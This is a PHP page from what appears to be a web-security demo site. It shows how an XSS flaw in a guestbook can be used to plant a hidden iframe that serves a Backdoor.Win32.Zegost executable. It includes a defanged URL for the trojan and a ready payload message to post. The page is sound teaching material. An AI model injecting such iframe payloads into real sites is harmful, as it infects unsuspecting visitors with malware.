-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathmalware.php
65 lines (59 loc) · 3.6 KB
/
malware.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
<?php
require('includes/functions.php');
echo getHeader('Malware Distribution');
?>
<!-- Main jumbotron for a primary marketing message or call to action -->
<div class="jumbotron">
<div class="container">
<h1>Malware Distributon</h1>
<a class="btn btn-primary btn-lg" href="/">
<span class="glyphicon glyphicon-chevron-left"></span>
Back To Home
</a>
</div>
</div>
<div class="container">
<!-- Example row of columns -->
<div class="row">
<div class="col-md-12">
<h2>Distributing a Trojan Horse via an XSS Vulnerability</h2>
<span>This is a continuation of the <a href="/cross-site-scripting" target="_blank">XSS (Cross-Site Scripting) demonstration</a></span><br><br>
<span>This demonstration does not specifically require the example guestbook from the XSS demo.</span>
<br><br>
<span>An attacker who discovers an XSS vulnerability in a website, can easily implement an invisible <code><?php echo htmlentities("<iframe>"); ?></code> anywhere on the page which would load anything that the attacker specifies.</span>
<span>Remotely hosting malware, specifically in this case a <a href="https://www.owasp.org/index.php/Trojan_Horse" target="_blank">Trojan Horse</a> is a very easy way to infect the machines of unsuspecting visitors to this website.</span>
<br><br>
<span>For this demo, we're going to utilize <a href="http://support.clean-mx.com/clean-mx/viruses.php" target="_blank">Clean-MX</a> in order to find a Trojan's remote URL to create a malicious <code><?php echo htmlentities("<iframe>"); ?></code></span>
<br><br>
<h4>The Trojan Horse - <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Backdoor:Win32/Zegost.AD#tab=2" target="_blank">Backdoor.Win32.Zegost</a></h4>
<pre>
<code class="html">
hxxp://87[dot]duote[dot]com[dot]cn/ett[dot]exe
</code>
</pre>
<span><small>Source: <a target="_blank" href="http://support.clean-mx.com/clean-mx/viruses.php">Clean-MX Support</a></small></span>
<br>
<br>
<span>After identifying the vulnerable input on the target website, in this case is the message box on our <a href="/cross-site-scripting/example" target="_blank">example page</a> we're going to create a malicious post.</span>
<br><br>
<h4>The Guestbook Message</h4>
<pre>
<code class="text">
<?php echo htmlentities('
<iframe src="hxxp://87[dot]duote[dot]com[dot]cn/ett[dot]exe" width="1" height="1" style="visibility:hidden"></iframe>
Such a beautiful guestbook you have here, it would be a shame if someone defaced it! <3
'); ?>
</code>
</pre>
<span>Like what you see? Go ahead and post it in the vulnerable guestbook app! Below is a screenshot of the attack taking place. Every visitor to this webpage will not see the invisible iframe inside of the post but will be served a file download immediately.</span>
<hr>
<img src="content/malware-distribution/example.png" alt="Notice the automatic download of the Trojan's exe file">
<hr>
<br><br>
<h4>How To Protect Yourself</h4>
<span>For unsuspecting visitors, if you see something like this, be smart and do not accept any file downloads automatically. For developers, see the <a href="/cross-site-scripting" target="_blank">solution section in my Cross-Site Scripting demonstration</a></span>
</div>
</div>
<?php
echo getFooter();
?>